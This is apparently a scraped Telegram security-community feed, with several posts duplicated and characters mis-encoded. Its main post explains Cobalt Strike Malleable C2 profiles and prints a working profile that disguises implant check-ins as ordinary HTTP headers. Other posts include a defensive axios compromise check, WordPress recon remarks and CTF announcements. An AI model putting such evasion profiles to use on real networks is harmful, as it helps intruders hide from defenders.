Forwarded from vx-underground
> be iranian threat actors
> compromise FBI directors personal email
> fast forward like, 5 hours
> $10,000,000 bounty on head
Opinion: I think Kash Patel is extremely mad
> compromise FBI directors personal email
> fast forward like, 5 hours
> $10,000,000 bounty on head
Opinion: I think Kash Patel is extremely mad
๐คฏ5๐คฃ1
some threat actors get into a system โ letโs say your personal computer.
now youโre also a hackerโฆ you think:
โYeah I can just monitor the traffic with Wireshark and catch them blah blah.โ
but hereโs the thingโฆ
They can make their traffic look completely legit. how?
Malleable C2 profiles
This is basically a domain-specific language (DSL) introduced by Cobalt Strike that lets redteamers redefine how their beacon(implant) communicates with the TS.
means....
They can disguise malicious traffic to look like:
* browsing social media
* streaming music
* accessing cloud services
So your โsuspicious trafficโ just looks normal.
Core components:
โข HTTP GET / POST
โข Global options (sleeptime, useragent, etc.)
โข Data transformation & obfuscation (prepend, append, encoding)
whatโs happening here?
โข Beacon checks in with metadata (ID, hostname, process, etc.)
โข Data gets base64 encoded
โข Then
โข Sent inside a custom header โ
Now it just looks like a normal HTTP request header.
Meanwhileโฆ
โข Team Server responds with payload
โข Encoded + compressed (gzip)
โข Still looks legit in traffic
There are a lot of templates on GitHub go check them out
but donโt just copy-paste them
u will get flagged fast :)
Most public profiles are already burned.
Alsoโฆ
~90% of them are HTTP/S listeners
If you want to go deeper (P2P, SMB, DNSโฆ)
@AfroSec
now youโre also a hackerโฆ you think:
โYeah I can just monitor the traffic with Wireshark and catch them blah blah.โ
but hereโs the thingโฆ
They can make their traffic look completely legit. how?
Malleable C2 profiles
This is basically a domain-specific language (DSL) introduced by Cobalt Strike that lets redteamers redefine how their beacon(implant) communicates with the TS.
means....
They can disguise malicious traffic to look like:
* browsing social media
* streaming music
* accessing cloud services
So your โsuspicious trafficโ just looks normal.
Core components:
โข HTTP GET / POST
โข Global options (sleeptime, useragent, etc.)
โข Data transformation & obfuscation (prepend, append, encoding)
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36";
set jitter 0;
set sleeptime 0;
set timeout 10;
set retry 0;
http-get {
set uri "/afro_checkin.php";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8";
header "Accept-Language" "en-US,en;q=0.5";
header "Connection" "keep-alive";
metadata {
base64;
prepend "user=";
header "z-User";
}
}
server {
header "Server" "nginx/1.18.0";
contentencoding "gzip";
output {
print;
}
}
}
whatโs happening here?
โข Beacon checks in with metadata (ID, hostname, process, etc.)
โข Data gets base64 encoded
โข Then
"user=" is prepended โ user=base64payloadโข Sent inside a custom header โ
z-UserNow it just looks like a normal HTTP request header.
Meanwhileโฆ
โข Team Server responds with payload
โข Encoded + compressed (gzip)
โข Still looks legit in traffic
There are a lot of templates on GitHub go check them out
but donโt just copy-paste them
u will get flagged fast :)
Most public profiles are already burned.
Alsoโฆ
~90% of them are HTTP/S listeners
If you want to go deeper (P2P, SMB, DNSโฆ)
@AfroSec
๐ฅ3๐1
AfroSec
hmmm ๐ @AfroSec
thank you guys for your birthday wishes, I really mean it
A lot of new members joined this year too , thank you all for being part of my journey.
much love and respect ๐
@AfroSec
A lot of new members joined this year too , thank you all for being part of my journey.
much love and respect ๐
@AfroSec
โคโ๐ฅ8โค2
Forwarded from Yekolo Temari (แจแแ แฐแแช)
๐ If you installed
axios@1.14.1 or axios@0.30.4, assume your system is compromised!๐ Am I affected?
- MacOS
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"- Linux
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED"- Windows
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISEDFix it:
npm install axios@1.14.0 โ for 1.x usersnpm install axios@0.30.3 โ for 0.x usersrm -rf node_modules/plain-crypto-jsnpm install --ignore-scriptsRead More [ Blog ]
Please open Telegram to view this post
VIEW IN TELEGRAM
๐๐๐๐ฎ๐ซ๐ข๐ญ๐ฒ ๐ ๐ข๐ซ๐ฅโง
Iโm not someone you can put in one box. Iโm just a high school girl whoโs been exploring since around grade 7 jumping from Hacking(main hobby) to programming, from philosophy to art, from Robotics to chess. Not because Iโm lost, but because Iโm curious aboutโฆ
hey fam
my friend is out here mastering everything from creative hobbies to diving deep into the world of hacking like wow
If youโre into tech, security, or just love seeing someone passionate about leveling up, you should definitely check her out!
Big respect for the grind ๐ฏ๐ฅ
so lets show some love and support :))
channel : https://t.me/vxnsec
@AfroSec
my friend is out here mastering everything from creative hobbies to diving deep into the world of hacking like wow
If youโre into tech, security, or just love seeing someone passionate about leveling up, you should definitely check her out!
Big respect for the grind ๐ฏ๐ฅ
so lets show some love and support :))
channel : https://t.me/vxnsec
@AfroSec
Telegram
๐๐๐๐ฎ๐ซ๐ข๐ญ๐ฒ ๐ ๐ข๐ซ๐ฅโง
Documenting my journey.
|Hacking| and my hobbies
@L4inux
Js random highschool kid
They call m3 Vixy๐
Polymath
|Hacking| and my hobbies
@L4inux
Js random highschool kid
They call m3 Vixy๐
Polymath
โค6โก3๐ฅฑ1
heyyy everyone
we are gonna be live on discord just kinda chill event we will solve one AD machine and learn along the way
if u r free check it out now https://discord.gg/XP948E8B :)
@AfroSec
we are gonna be live on discord just kinda chill event we will solve one AD machine and learn along the way
if u r free check it out now https://discord.gg/XP948E8B :)
@AfroSec
Discord
Join the Red1 Discord Server!
Check out the Red1 community on Discord - hang out with 36 other members and enjoy free voice and text chat.
๐ฅ8โก2
#experience
from what I saw (experience), most Ethiopian websites are CMS-based, mainly WordPress. The funny part is that they completely trust the CMS to handle everything end-to-end, like security or other configurations. but, the fact is that the wp-json schema is enough to gather all their endpoints and do shady stuff ๐ Sometimes they open sensitive directories like wp-includes or wp-content, then forget about their existence, which is a really bad security measure.
@AfroSec
from what I saw (experience), most Ethiopian websites are CMS-based, mainly WordPress. The funny part is that they completely trust the CMS to handle everything end-to-end, like security or other configurations. but, the fact is that the wp-json schema is enough to gather all their endpoints and do shady stuff ๐ Sometimes they open sensitive directories like wp-includes or wp-content, then forget about their existence, which is a really bad security measure.
@AfroSec
๐ฅ3โก2
Forwarded from The Hacker News
๐จ WARNING - APT28 ran a global router hijack to steal credentials.
The group compromised MikroTik and TP-Link devices, rewrote DNS settings, and redirected traffic for credential theft at scale -- impacting 18,000+ IPs across 120 countries, including government and cloud targets.
๐ Read here โ https://thehackernews.com/2026/04/russian-state-linked-apt28-exploits.html
The group compromised MikroTik and TP-Link devices, rewrote DNS settings, and redirected traffic for credential theft at scale -- impacting 18,000+ IPs across 120 countries, including government and cloud targets.
๐ Read here โ https://thehackernews.com/2026/04/russian-state-linked-apt28-exploits.html
๐คฏ2
This media is not supported in your browser
VIEW IN TELEGRAM
that one skid after gaining initial access on his own virtual box which by disabling all defender engines and interfaces ๐๐๐๐
just for fun demo endaydebrachu lol
@AfroSec
just for fun demo endaydebrachu lol
@AfroSec
๐คฃ6๐2
Forwarded from Buna Byte
Something big is comingโฆ ๐
AASTU is about to witness a whole different level.
This isnโt a workshop.
This isnโt a lecture.
This is a battlefield.
๐ป Real-world challenges
๐ง Skill over theory
๐ฉ Only the sharpest survive
Built in silence by Buna Byteโฆ now itโs almost time to go live.
๐ April 15
โฐ 2:00 PM
Think youโre ready? Step in and prove it.
Not ready? This is where you level up.
Stay locked in. Details dropping soon.
#AASTU #CTF #CyberSecurity #BunaByte #HackTheSystem
AASTU is about to witness a whole different level.
This isnโt a workshop.
This isnโt a lecture.
This is a battlefield.
๐ป Real-world challenges
๐ง Skill over theory
๐ฉ Only the sharpest survive
Built in silence by Buna Byteโฆ now itโs almost time to go live.
๐ April 15
โฐ 2:00 PM
Think youโre ready? Step in and prove it.
Not ready? This is where you level up.
Stay locked in. Details dropping soon.
#AASTU #CTF #CyberSecurity #BunaByte #HackTheSystem
โค5๐1
Claude_Mythos_Preview.pdf
22.6 MB
Claude Mythos Preview
I didn't read it, but I will if I get time. If you want to read it, here it is
@AfroSec
๐2โก1